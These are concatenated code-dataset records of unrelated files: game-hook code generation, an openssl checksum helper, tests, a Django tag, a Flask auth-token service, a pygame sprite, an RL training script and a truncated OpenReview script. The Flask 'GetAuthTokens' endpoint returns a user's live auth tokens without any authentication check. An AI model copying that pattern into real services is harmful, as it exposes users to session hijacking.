lines\n","sub_path":"src/create_map.py","file_name":"create_map.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505377257","text":"#!/usr/bin/python3\nimport datetime\nimport os\nimport argparse\nimport json\nimport re\n#from itanium_demangler import parse as demangle\n\nparser = argparse.ArgumentParser(description='Processes headers')\nparser.add_argument('-a', '--arch', type=str, help='arch', choices=['x86', 'x64'], required=True)\nparser.add_argument('-p', '--platform', type=str, help='platform', choices=['windows'], required=True)\nparser.add_argument('input', metavar='file', type=str, nargs='+', help='input json symbol maps')\nargs = parser.parse_args()\nout_file_cpp = open(\"main.cpp\", \"w\")\nout_file_header = open(\"main.h\", \"w\")\nout_file_asm = open(\"init.asm\", \"w\")\narch = args.arch\nplatform = args.platform\nin_files = 
args.input\n\nsymbol_list = []\nsymbol_list_versioned = []\nvtable_list = []\nvtable_output = []\nvar_list = []\nvar_list_versioned = []\ninclude_list = []\ncxx_output = \"\"\nasm_output = \"\"\n\ndef output_cpp(text):\n text += \"\\n\"\n global cxx_output\n cxx_output += \"CXX: \" + text\n if out_file_cpp is not None:\n out_file_cpp.write(text)\n\ndef output_header_cpp(text):\n text += \"\\n\"\n global cxx_output\n cxx_output += \"CXX: \" + text\n if out_file_header is not None:\n out_file_header.write(text)\n\ndef output_asm(text):\n text += \"\\n\"\n global asm_output\n asm_output += \"ASM: \" + text\n if out_file_asm is not None:\n out_file_asm.write(text)\n\ndef read_json(file):\n reader = json.load(file)\n for key in reader:\n if key == \"vtable\":\n for obj in reader[key]:\n vtable_list.append({\"name\": obj[\"name\"], \"parent\": obj.get(\"parent\", \"\"), \"address\": obj.get(\"address\", \"\"), \"functions\": obj.get(\"functions\", []), \"overload\": obj.get(\"overload\", \"null\")})\n if key == \"functions\":\n for obj in reader[key]:\n symbol_list.append({\"mangled_name\": obj[\"name\"], \"address\": obj[\"address\"], \"signature\": obj.get(\"signature\", \"\"), \"overload\": obj.get(\"overload\", \"null\")})\n if type(obj[\"address\"]) == dict:\n symbol_list_versioned.append({\"mangled_name\": obj[\"name\"], \"address\": obj[\"address\"], \"signature\": obj.get(\"signature\", \"\"), \"overload\": obj.get(\"overload\", \"null\")})\n if key == \"variables\":\n for variable_keys in reader[key].keys():\n var_list.append({\"name\": variable_keys, \"address\": reader[key][variable_keys]})\n if type(reader[key][variable_keys] == dict):\n var_list_versioned.append({\"name\": variable_keys, \"address\": reader[key][variable_keys]}) \n if key == \"includes\":\n for strs in reader[key]:\n include_list.append(strs)\n\n\ndef generate_windows_cpp():\n output_cpp(\"\")\n output_cpp(\"#include \")\n output_cpp(\"\")\n output_cpp(\"BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {\")\n output_cpp(\"\\tif(fdwReason == DLL_PROCESS_ATTACH) InitBedrockPointers();\")\n output_cpp(\"\\treturn TRUE;\")\n output_cpp(\"}\")\n\ndef mangled_name_to_variable(str):\n str = str.replace(\"?\", '_')\n str = str.replace(\"@\", '_')\n return str\n\ndef generate_init_cpp():\n output_header_cpp(\"\")\n output_header_cpp(\"#pragma once\")\n output_header_cpp(\"\")\n output_header_cpp(\"#include \")\n if len(symbol_list) > 0 or len(vtable_list) > 0:\n output_header_cpp(\"\")\n output_header_cpp(\"extern \\\"C\\\" {\")\n for a in symbol_list:\n output_header_cpp(\"\\textern void* \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr;\")\n for a in vtable_list:\n output_header_cpp(\"\\textern void* \" + a[\"name\"] + \"_vtable;\")\n output_header_cpp(\"}\")\n output_header_cpp(\"\")\n output_header_cpp(\"void InitBedrockPointers();\")\n if len(symbol_list_versioned) > 0:\n output_header_cpp(\"void InitVersionPointers(std::string);\")\n output_cpp(\"\")\n output_cpp(\"#include \\\"main.h\\\"\")\n for a in include_list:\n output_cpp(a)\n output_cpp(\"\")\n for a in var_list:\n address = a[\"address\"]\n if address and type(address) == str:\n address = \" = reinterpret_cast<\" + a[\"name\"][:a[\"name\"].rfind(\"*\")+1] + \">(Zenova::Hook::SlideAddress(\" + address + \"))\"\n else:\n address = \"\"\n output_cpp(a[\"name\"] + address + \";\")\n output_cpp(\"\")\n output_cpp(\"extern \\\"C\\\" {\")\n for a in symbol_list:\n output_cpp(\"\\tvoid* \" + 
mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr;\")\n for a in vtable_list:\n output_cpp(\"\\tvoid* \" + a[\"name\"] + \"_vtable;\")\n output_cpp(\"}\")\n output_cpp(\"\")\n if len(symbol_list_versioned) > 0:\n output_cpp(\"static std::unordered_map pointerList[\" + str(len(symbol_list_versioned) + len(var_list_versioned)) + \"];\")\n output_cpp(\"\")\n if len(symbol_list) > 0 or len(vtable_list) > 0 or len(var_list) > 0:\n output_cpp(\"void InitBedrockPointers() {\")\n for a in var_list:\n if a[\"address\"] == \"\":\n loc = a[\"name\"].rfind(\"*\") + 1\n while a[\"name\"][loc] == \" \":\n loc += 1\n output_cpp(\"\\t\" + a[\"name\"][loc:] + \" = reinterpret_cast<\" + a[\"name\"][:-a[\"name\"].rfind(\"*\")] + \">(Zenova::Hook::FindVariable(\\\"\" + a[\"name\"] + \"\\\"));\")\n pointer_index = 0\n for a in symbol_list:\n if type(a[\"address\"]) == dict:\n for version, address in a[\"address\"].items():\n output_cpp(\"\\tpointerList[\" + str(pointer_index) + \"][\\\"\" + str(version) + \"\\\"] = \" + str(address) + \";\")\n pointer_index += 1\n elif type(a[\"address\"]) == str:\n name_legal = mangled_name_to_variable(a[\"mangled_name\"])\n if a[\"address\"] != \"\":\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::SlideAddress(\" + a[\"address\"] + \"));\")\n if a[\"overload\"] == \"always\" or (a[\"overload\"] == \"null\" and a[\"address\"] == \"\"):\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::FindSymbol(\\\"\" + a[\"mangled_name\"] + \"\\\"));\")\n for a in vtable_list:\n if a[\"address\"] != \"\":\n output_cpp(\"\\t\" + a[\"name\"] + \"_vtable = reinterpret_cast(Zenova::Hook::SlideAddress(\" + a[\"address\"] + \"));\")\n if a[\"overload\"] == \"always\" or (a[\"overload\"] == \"null\" and a[\"address\"] == \"\"):\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::FindVtable(\\\"\" + a[\"mangled_name\"] + \"\\\"));\")\n for var in var_list_versioned:\n for version, address in var[\"address\"].items():\n output_cpp(\"\\tpointerList[\" + str(pointer_index) + \"][\\\"\" + str(version) + \"\\\"] = \" + str(address) + \";\")\n pointer_index += 1\n output_cpp(\"}\")\n if len(symbol_list_versioned) > 0 or len(var_list_versioned) > 0:\n output_cpp(\"\")\n output_cpp(\"void InitVersionPointers(std::string versionId) {\")\n pointer_index = 0\n for a in symbol_list_versioned:\n name_legal = mangled_name_to_variable(a[\"mangled_name\"])\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::SlideAddress(pointerList[\" + str(pointer_index) + \"][versionId]));\")\n pointer_index += 1\n for var in var_list_versioned:\n address = \" = reinterpret_cast<\" + var[\"name\"][:var[\"name\"].rfind(\"*\")+1] + \">(Zenova::Hook::SlideAddress(pointerList[\" + str(pointer_index) + \"][versionId]))\"\n output_cpp(\"\\t\" + var[\"name\"][var[\"name\"].rfind(\"*\")+1:].strip() + address + \";\")\n pointer_index += 1\n output_cpp(\"}\")\n\n\n\ndef process_vtable(vtable):\n vtable_out = next((x for x in vtable_output if vtable[\"name\"] == x[\"name\"]), {})\n if not vtable_out:\n vtable_out[\"name\"] = vtable[\"name\"]\n vtable_out[\"functions_out\"] = []\n vtable_out[\"functions_in\"] = []\n vtable_out[\"parents\"] = []\n i = 0\n vtable_parent_str = vtable[\"parent\"]\n vtable_parent_out = {}\n if vtable_parent_str:\n vtable_parent = next((x for x in vtable_list if x[\"name\"] == vtable_parent_str), {})\n if vtable_parent:\n vtable_parent_out = process_vtable(vtable_parent)\n 
vtable_out[\"parents\"].append(vtable_parent_out)\n vtable_out[\"parents\"].extend(vtable_parent_out[\"parents\"])\n for a in vtable[\"functions\"]:\n func_name_base = a.replace(vtable[\"name\"] + \"@@\", \"@@\", 1)\n if len(vtable_out[\"parents\"]) > 0:\n for parent in vtable_out[\"parents\"]:\n func_name_base = re.sub('(@@@.*)' + parent[\"name\"] + '@@', r'\\g<1>1@', func_name_base)\n for b in vtable_parent_out[\"functions_in\"][i:]:\n if func_name_base == b[0]:\n break\n vtable_out[\"functions_in\"].append([b[0], i])\n i += 1\n vtable_out[\"functions_in\"].append([func_name_base, i])\n if a:\n vtable_out[\"functions_out\"].append([a, i])\n i += 1\n vtable_output.append(vtable_out)\n return vtable_out\n \n \n\n#NASM, MASM doesn't allow long identifiers\ndef generate_init_func_x86(size):\n if size == 64:\n reg = \"rax\"\n pointer_size = 8\n output_asm(\"bits 64\")\n if size == 32:\n reg = \"eax\"\n pointer_size = 4\n\n output_asm(\"SECTION .data\")\n for a in symbol_list:\n output_asm(\"extern \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr\")\n for a in vtable_list:\n output_asm(\"extern \" + a[\"name\"] + \"_vtable\")\n output_asm(\"\")\n output_asm(\"SECTION .text\")\n for a in symbol_list:\n output_asm(\"global \" + a[\"mangled_name\"])\n output_asm(a[\"mangled_name\"] + \":\")\n output_asm(\"\\tmov rax, [rel \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr\" + \"]\")\n output_asm(\"\\tjmp rax\")\n for vtable in vtable_list:\n vtable_out = process_vtable(vtable)\n print(vtable_out[\"name\"] + \"\\n\")\n for a in vtable_out[\"functions_out\"]:\n output_asm(\"global \" + a[0])\n output_asm(a[0] + \":\")\n output_asm(\"\\tmov \" + reg + \", [rel \" + vtable_out[\"name\"] + \"_vtable]\")\n output_asm(\"\\tjmp [\" + reg + \"+\" + str(a[1] * pointer_size) + \"]\")\n\ndef generate_init_func_arm():\n i = 0\n for a in symbol_list:\n output_asm(\".globl \" + a[\"mangled_name\"] + \"\")\n output_asm(\".type \" + a[\"mangled_name\"] + \", %function\")\n output_asm(a[\"mangled_name\"] + \":\")\n output_asm(f\"\\tldr r12, .L{i}$ptr\")\n output_asm(f\".L{i}$pldr:\")\n output_asm(f\"\\tldr r12, [pc, r12]\")\n output_asm(f\"\\tldr r12, [r12]\")\n output_asm(f\"\\tbx\t r12\")\n output_asm(f\".L{i}$ptr:\")\n output_asm(f\"\\t.long {a['mangled_name']}_ptr(GOT_PREL)-((.L{i}$pldr+8)-.L{i}$ptr)\")\n output_asm(\"\\t.size \" + a[\"mangled_name\"] + \", .-\" + a[\"mangled_name\"])\n i += 1\n\ndef generate_init_func():\n gen_time = datetime.datetime.utcnow().strftime(\"%a %b %d %Y %H:%M:%S UTC\")\n output_cpp(\"// This file was automatically generated using tools/process_csv.py\")\n output_cpp(\"// Generated on \" + gen_time)\n output_header_cpp(\"// This file was automatically generated using tools/process_csv.py\")\n output_header_cpp(\"// Generated on \" + gen_time)\n generate_init_cpp()\n generate_windows_cpp()\n\n output_asm(\"; This file was automatically generated using tools/process_csv.py\")\n output_asm(\"; Generated on \" + gen_time)\n if arch == \"x86\":\n generate_init_func_x86(32)\n if arch == \"x64\":\n generate_init_func_x86(64)\n if arch == \"armeabi-v7a\":\n print(arch + \" not supported\")\n #generate_init_func_arm()\n\nfor file_path in in_files:\n print(\"Parsing Symbol Map:\" + file_path)\n file_full_path = os.path.abspath(file_path)\n with open(file_path, \"r\") as f:\n 
read_json(f)\ngenerate_init_func()\nprint(cxx_output)\nprint(asm_output)\nout_file_cpp.close()\nout_file_header.close()\nout_file_asm.close()","sub_path":"source/process_headers.py","file_name":"process_headers.py","file_ext":"py","file_size_in_byte":12145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"618282946","text":"# inspired by https://github.com/shash873/simple-file-checksum/\n\nimport asyncio\nimport logging\nfrom enum import Enum\nfrom pathlib import Path\n\nfrom .exceptions import ExporterException\n\nlog = logging.getLogger(__name__)\n\n\nclass Algorithm(Enum):\n \"\"\"Maps openssl supported algorithms with produced output size\"\"\"\n\n MD5 = 32\n SHA1 = 40\n SHA256 = 64\n SHA384 = 96\n SHA512 = 128\n\n\nasync def checksum(file_path: Path, algorithm=Algorithm.SHA256) -> str:\n \"\"\"Calls underlying openssl for hashing\"\"\"\n\n str_file_path = str(file_path)\n if not file_path.is_file():\n raise ExporterException(f\"Provided path '{str_file_path}' is not a file\")\n\n command_args = [\"openssl\", \"dgst\", f\"-{algorithm.name}\", str_file_path]\n proc = await asyncio.create_subprocess_exec(\n *command_args,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n stdout, stderr = await proc.communicate()\n decoded_stdout = stdout.decode()\n\n if proc.returncode != 0:\n log.warning(\"STDOUT: %s\", decoded_stdout)\n log.warning(\"STDERR: %s\", stderr.decode())\n raise ExporterException(\n f\"Could not digest with algorithm={algorithm.name} of file={str_file_path}\"\n )\n\n digest: str = decoded_stdout.strip().split(\" \")[-1]\n if len(digest) != algorithm.value:\n raise ExporterException(\n f\"Expected digest len={algorithm.value} for algorithm={algorithm.name}\"\n f\", got len={len(digest)} for digest={digest}\"\n )\n\n return digest\n","sub_path":"services/web/server/src/simcore_service_webserver/exporter/async_hashing.py","file_name":"async_hashing.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"251712462","text":"import unittest\nfrom sentiment_analysis import SentimentAnalysisSpanish\n\nclass TestSentimentAnalysis(unittest.TestCase):\n \n def test_sum(self):\n sentiment = SentimentAnalysisSpanish()\n test_sentences_positive = [\"prados bellos y alegres a mi alrededor, felicidad, viva la vida\", \"me encantan los gatos y cantar, disfruto mucho\", \"que buena noticia me alegro\"]\n\n test_sentences_negative = [\"estoy muy enfadado y molesto y no quiero hablar\", \"me parece terrible esto que me estás diciendo\", \"fuera de aquí no quiero verte\"]\n\n for text in test_sentences_positive:\n print(text)\n sentiment_result = sentiment.sentiment(text)\n print(sentiment_result)\n print(\"--------\")\n self.assertGreater(sentiment_result, 0.5, \"Sentiment should be positive\")\n \n for text in test_sentences_negative:\n print(text)\n sentiment_result = sentiment.sentiment(text)\n print(sentiment_result)\n print(\"--------\")\n self.assertLess(sentiment_result, 0.5, \"Sentiment should be negative\")\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"sentiment_analysis_spanish/test_sentiment_analysis.py","file_name":"test_sentiment_analysis.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363672776","text":"from django import template\r\nfrom django.conf import settings\r\n\r\nfrom account.utils 
import user_display\r\n\r\n\r\n\r\nregister = template.Library()\r\n\r\n\r\n\r\nclass UserDisplayNode(template.Node):\r\n def __init__(self, user, as_var=None):\r\n self.user_var = template.Variable(user)\r\n self.as_var = as_var\r\n \r\n def render(self, context):\r\n user = self.user_var.resolve(context)\r\n \r\n display = user_display(user)\r\n \r\n if self.as_var:\r\n context[self.as_var] = display\r\n return \"\"\r\n return display\r\n\r\n\r\n@register.tag(name=\"user_display\")\r\ndef do_user_display(parser, token):\r\n \"\"\"\r\n Example usage::\r\n \r\n {% user_display user %}\r\n \r\n or if you need to use in a {% blocktrans %}::\r\n \r\n {% user_display user as user_display}\r\n {% blocktrans %}{{ user_display }} has sent you a gift.{% endblocktrans %}\r\n \r\n \"\"\"\r\n bits = token.split_contents()\r\n \r\n if len(bits) == 2:\r\n user = bits[1]\r\n as_var = None\r\n elif len(bits) == 4:\r\n user = bits[1]\r\n as_var = bits[3]\r\n else:\r\n raise template.TemplateSyntaxError(\"'%s' takes either two or four arguments\" % bits[0])\r\n \r\n return UserDisplayNode(user, as_var)\r\n","sub_path":"colab/apps/account/templatetags/account_tags.py","file_name":"account_tags.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"323141960","text":"# Import the database object from the main app module\nimport json\nimport logging\nimport uuid\nimport datetime\n\nimport Failures\nfrom app import db\nfrom app.User import services as user_service\n\nfrom flask_restful import Resource, Api\nfrom flask import request, Blueprint\n\nfrom Validation import Validation\n\nfrom models import AuthenticationToken\n\nauth_token_app = Blueprint('authtoken', __name__, url_prefix='/authtoken')\napi = Api(auth_token_app)\n\n\nclass AuthTokensRequest(Resource):\n\n def post(self):\n # Get values\n server = request.headers.get('server')\n id_user = request.form.get('idUser')\n browser = request.form.get('browser')\n ip_address = request.form.get('ipAddress')\n\n # Validate required fields\n validation = Validation()\n validation.add_required_field('server', server)\n validation.add_required_field('idUser', id_user)\n validation.add_required_field('browser', browser)\n validation.add_required_field('ipAddress', ip_address)\n if not validation.is_valid():\n return validation.get_validation_response()\n\n # Parse numbers\n try:\n id_user = int(id_user)\n except:\n return Failures.not_a_number('idUser', id_user)\n\n # Validate user exists, is validated and is not blocked\n user = user_service.get_user(id_user)\n if user is None:\n return Failures.unknown_user_id(id_user)\n if not user.confirmed:\n return Failures.email_not_confirmed()\n if user.blocked:\n return Failures.user_blocked()\n\n # Delete expired tokens\n AuthenticationToken.query.filter(AuthenticationToken.validity < datetime.datetime.now()).delete()\n db.session.flush()\n\n # Generate token\n token = str(uuid.uuid1())\n\n # Save token and browser information\n authentication_token = AuthenticationToken()\n authentication_token.id_user = id_user\n authentication_token.browser = browser\n authentication_token.server = server\n authentication_token.ip_address = ip_address\n authentication_token.validity = datetime.datetime.now() + datetime.timedelta(minutes=120)\n authentication_token.token = token\n db.session.add(authentication_token)\n db.session.commit()\n\n logging.info('AuthToken-controller: Request auth token: success: %s -> %s*****', user.id, 
token[0:6])\n\n return {'success': True, 'token': token}\n\n\nclass GetAuthTokens(Resource):\n\n def post(self, id_user):\n # Get values\n server = request.headers.get('server')\n browser = request.form.get('browser')\n ip_address = request.form.get('ipAddress')\n\n # Validate required fields\n validation = Validation()\n validation.add_required_field('server', server)\n validation.add_required_field('idUser', id_user)\n validation.add_required_field('browser', browser)\n validation.add_required_field('ipAddress', ip_address)\n if not validation.is_valid():\n return validation.get_validation_response()\n\n # Parse numbers\n try:\n id_user = int(id_user)\n except:\n return Failures.not_a_number('idUser', id_user)\n\n authentication_token_models = AuthenticationToken.query.filter_by(\n id_user=id_user,\n # browser=browser,\n # server=server,\n # ip_address=ip_address\n ).all()\n\n authentication_tokens = []\n for authentication_token_model in authentication_token_models:\n authentication_tokens.append(authentication_token_model.token)\n\n logging.info('AuthToken-controller: Get auth tokens: success: %s -> %s tokens', id_user,\n len(authentication_tokens))\n\n return authentication_tokens\n\napi.add_resource(AuthTokensRequest, '/request')\napi.add_resource(GetAuthTokens, '/tokens/')\n","sub_path":"app/AuthToken/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321736553","text":"import pygame\r\nfrom pygame import *\r\nfrom random import randint\r\n\r\nWIDTH = HEIGHT = 96\r\n\r\nclass Item(sprite.Sprite):\r\n\tdef __init__(self, startPos, value):\r\n\t\tsprite.Sprite.__init__(self)\r\n\t\tself.startX,self.startY = startPos\r\n\t\tself.speed = randint(2,8)\r\n\t\tself.value = value\r\n\t\t\r\n\t\tif value == 2:\r\n\t\t\tself.effect = -5\r\n\t\telif value == 3:\r\n\t\t\tself.effect = -1\r\n\t\telif value == 4:\r\n\t\t\tself.effect = 1\r\n\t\telse:\r\n\t\t\tself.effect = 2\r\n\t\t\t\r\n\t\t\r\n\t\t\r\n\t\tself.image = Surface((WIDTH,HEIGHT))\r\n\t\tself.image = image.load(\"textures/\" + str(value) + \".png\")\r\n\t\tself.rect = Rect(self.startX, self.startY, WIDTH, HEIGHT)\r\n\t\r\n\tdef update(self):\r\n\t\tself.rect.y += self.speed\r\n\t\t","sub_path":"BOTAN/ocenki.py","file_name":"ocenki.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472295698","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom mushroom_rl.utils.callbacks import PlotDataset\nfrom mushroom_rl.utils.preprocessors import MinMaxPreprocessor\n\nfrom mushroom_rl.algorithms.actor_critic import SAC\nfrom mushroom_rl.core import Core\nfrom mushroom_rl.utils.dataset import compute_J, episodes_length\n\nfrom mushroom_rl.environments.mujoco_envs import HumanoidGait\nfrom mushroom_rl.environments.mujoco_envs.humanoid_gait import \\\n VelocityProfile3D, RandomConstantVelocityProfile, ConstantVelocityProfile\n\n\nclass CriticNetwork(nn.Module):\n def __init__(self, input_shape, output_shape, n_features, **kwargs):\n super(CriticNetwork, self).__init__()\n\n n_input = input_shape[-1]\n n_output = output_shape[0]\n\n self._in = nn.Linear(n_input, n_features[0])\n self._h1 = nn.Linear(n_features[0], n_features[1])\n self._out = nn.Linear(n_features[1], n_output)\n\n nn.init.xavier_uniform_(self._in.weight,\n 
gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._h1.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._out.weight,\n gain=nn.init.calculate_gain('linear'))\n\n def forward(self, state, action):\n in_feats = torch.cat((state.float(), action.float()), dim=1)\n feats = F.relu(self._in(in_feats))\n feats = F.relu(self._h1(feats))\n\n out = self._out(feats)\n return torch.squeeze(out)\n\n\nclass ActorNetwork(nn.Module):\n def __init__(self, input_shape, output_shape, n_features, **kwargs):\n super(ActorNetwork, self).__init__()\n\n n_input = input_shape[-1]\n n_output = output_shape[0]\n\n self._in = nn.Linear(n_input, n_features[0])\n self._h1 = nn.Linear(n_features[0], n_features[1])\n self._out = nn.Linear(n_features[1], n_output)\n\n nn.init.xavier_uniform_(self._in.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._h1.weight,\n gain=nn.init.calculate_gain('relu'))\n nn.init.xavier_uniform_(self._out.weight,\n gain=nn.init.calculate_gain('linear'))\n\n def forward(self, state):\n in_feats = torch.squeeze(state, 1).float()\n\n feats = F.relu(self._in(in_feats))\n feats = F.relu(self._h1(feats))\n\n out = self._out(feats)\n return out\n\n\ndef create_SAC_agent(mdp, use_cuda=None):\n if use_cuda is None:\n use_cuda = torch.cuda.is_available()\n\n # Settings\n actor_mu_network = ActorNetwork\n actor_sigma_network = ActorNetwork\n network_layers_actor_mu = (512, 256)\n network_layers_actor_sigma = (512, 256)\n network_layers_critic = (512, 256)\n\n initial_replay_size = 3000\n max_replay_size = 100000\n batch_size = 256\n warmup_transitions = 5000\n tau = 0.005\n\n lr_alpha = 2e-6\n lr_actor = 2e-5\n lr_critic = 4e-5\n weight_decay_actor = 0.0\n weight_decay_critic = 0.0\n\n target_entropy = -22.0\n\n # Approximator\n actor_input_shape = mdp.info.observation_space.shape\n actor_mu_params = dict(network=actor_mu_network,\n n_features=network_layers_actor_mu,\n input_shape=actor_input_shape,\n output_shape=mdp.info.action_space.shape,\n use_cuda=use_cuda)\n\n actor_sigma_params = dict(network=actor_sigma_network,\n n_features=network_layers_actor_sigma,\n input_shape=actor_input_shape,\n output_shape=mdp.info.action_space.shape,\n use_cuda=use_cuda)\n\n actor_optimizer = {'class': optim.Adam,\n 'params': {'lr': lr_actor, 'weight_decay': weight_decay_actor}}\n\n critic_input_shape = (actor_input_shape[0] + mdp.info.action_space.shape[0],)\n critic_params = dict(network=CriticNetwork,\n optimizer={'class': optim.Adam,\n 'params': {'lr': lr_critic, 'weight_decay': weight_decay_critic}},\n loss=F.mse_loss,\n n_features=network_layers_critic,\n input_shape=critic_input_shape,\n output_shape=(1,),\n use_cuda=use_cuda)\n\n # create SAC agent\n agent = SAC(mdp_info=mdp.info,\n batch_size=batch_size, initial_replay_size=initial_replay_size,\n max_replay_size=max_replay_size,\n warmup_transitions=warmup_transitions, tau=tau, lr_alpha=lr_alpha,\n actor_mu_params=actor_mu_params, actor_sigma_params=actor_sigma_params,\n actor_optimizer=actor_optimizer, critic_params=critic_params,\n target_entropy=target_entropy, critic_fit_params=None)\n\n return agent\n\n\ndef create_mdp(gamma, horizon, goal, use_muscles):\n if goal == \"trajectory\" or goal == \"com_vel_trajectory\":\n mdp = HumanoidGait(gamma=gamma, horizon=horizon, n_intermediate_steps=10,\n goal_reward=goal,\n goal_reward_params=dict(use_error_terminate=True),\n use_muscles=use_muscles,\n obs_avg_window=1, act_avg_window=1)\n\n elif goal == \"max_vel\":\n mdp = 
HumanoidGait(gamma=gamma, horizon=horizon, n_intermediate_steps=10,\n goal_reward=goal,\n goal_reward_params=dict(traj_start=True),\n use_muscles=use_muscles,\n obs_avg_window=1, act_avg_window=1)\n\n elif goal == \"vel_profile\":\n velocity_profile = dict(profile_instance=VelocityProfile3D([\n RandomConstantVelocityProfile(min=0.5, max=2.0),\n ConstantVelocityProfile(0),\n ConstantVelocityProfile(0)]))\n\n mdp = HumanoidGait(gamma=gamma, horizon=horizon, n_intermediate_steps=10,\n goal_reward=goal,\n goal_reward_params=dict(traj_start=True,\n **velocity_profile),\n use_muscles=use_muscles,\n obs_avg_window=1, act_avg_window=1)\n else:\n raise NotImplementedError(\"Invalid goal selected, try one of \"\n \"['trajectory', 'com_vel_trajectory', 'vel_profile', 'max_vel']\")\n return mdp\n\n\ndef experiment(goal, use_muscles, n_epochs, n_steps, n_episodes_test):\n np.random.seed(1)\n\n # MDP\n gamma = 0.99\n horizon = 2000\n mdp = create_mdp(gamma, horizon, goal, use_muscles=use_muscles)\n\n # Agent\n agent = create_SAC_agent(mdp)\n\n # normalization callback\n normalizer = MinMaxPreprocessor(mdp_info=mdp.info)\n\n # plotting callback\n plotter = PlotDataset(mdp.info)\n\n # Algorithm(with normalization and plotting)\n core = Core(agent, mdp, callback_step=plotter, preprocessors=[normalizer])\n\n # training loop\n for n in range(n_epochs):\n core.learn(n_steps=n_steps, n_steps_per_fit=1)\n dataset = core.evaluate(n_episodes=n_episodes_test, render=True)\n print('Epoch: ', n,\n ' J: ', np.mean(compute_J(dataset, gamma)),\n ' Len_ep: ', int(np.round(np.mean(episodes_length(dataset))))\n )\n\n print('Press a button to visualize humanoid')\n input()\n core.evaluate(n_episodes=10, render=True)\n\n\nif __name__ == '__main__':\n goal = [\"trajectory\", \"com_vel_trajectory\", \"vel_profile\", \"max_vel\"]\n experiment(goal=goal[0], use_muscles=True,\n n_epochs=250, n_steps=10000, n_episodes_test=10)","sub_path":"examples/humanoid_sac.py","file_name":"humanoid_sac.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538385011","text":"#!/usr/bin/python\n\n###############################################################################\n# ex. 
python create-invitations.py --conf MyConf.org/2017 --baseurl http://localhost:3000\n# --username admin --password admin_pw\n#\n# To be run after submission due date to create review invitations for all the papers.\n# For each paper:\n# 1) create authorGroup (can see reviews, can't write a review)\n# reviewer group (reviewers for this paper)\n# and nonReviewerGroup (folks that aren't allowed to read the review at least not yet)\n# 2) create review invitation\n###############################################################################\n\n## Import statements\nimport argparse\nfrom openreview import *\nimport config\n\n## Argument handling\nparser = argparse.ArgumentParser()\nparser.add_argument('--baseurl', help=\"base url\")\nparser.add_argument('--username')\nparser.add_argument('--password')\n\nargs = parser.parse_args()\n\n## Initialize the client library with username and password\nclient = Client(baseurl=args.baseurl, username=args.username, password=args.password)\nprint(\"Connecting to \"+client.baseurl)\n\nblind_submissions = client.get_notes(invitation=config.BLIND_SUBMISSION)\nfor paper in blind_submissions:\n paper_num = str(paper.number)\n paperinv = config.CONFERENCE_ID + '/-/Paper' + paper_num\n paperGroup = config.CONFERENCE_ID + '/Paper' + paper_num\n authorGroup = paperGroup+'/Authors'\n\n ## Reviewer group - people that can see the review invitation\n reviewerGroup = paperGroup + '/Reviewers'\n try:\n client.get_group(id=reviewerGroup)\n print(\"Found \"+reviewerGroup)\n except openreview.OpenReviewException as e:\n # is group not found, then make groups and invites\n if e.args[0][0].startswith('Group Not Found'):\n print(\"Create \"+reviewerGroup)\n client.post_group(openreview.Group(\n id=reviewerGroup,\n signatures=[config.CONFERENCE_ID],\n writers=[config.CONFERENCE_ID],\n members=[],\n readers=[config.CONFERENCE_ID, config.PROGRAM_CHAIRS],\n signatories=[]))\n\n ## Review\n review_reply = {\n 'forum': paper.id,\n 'replyto': paper.id,\n 'writers': {'values-regex': paperGroup + '/AnonReviewer[0-9]+'},\n 'signatures': {'values-regex': paperGroup + '/AnonReviewer[0-9]+'},\n 'readers': {\n 'values': ['everyone'],\n 'description': 'The users who will be allowed to read the above content.'\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value-regex': '.{0,500}',\n 'description': 'Brief summary of your review (up to 500 chars).',\n 'required': True\n },\n 'review': {\n 'order': 2,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons (up to 5000 chars).',\n 'required': True\n },\n 'rating': {\n 'order': 4,\n 'value-dropdown': [\n '5: Top 15% of accepted papers, strong accept',\n '4: Top 50% of accepted papers, clear accept',\n '3: Marginally above acceptance threshold',\n '2: Marginally below acceptance threshold',\n '1: Strong rejection'\n ],\n 'required': True\n },\n 'confidence': {\n 'order': 5,\n 'value-radio': [\n '3: The reviewer is absolutely certain that the evaluation is 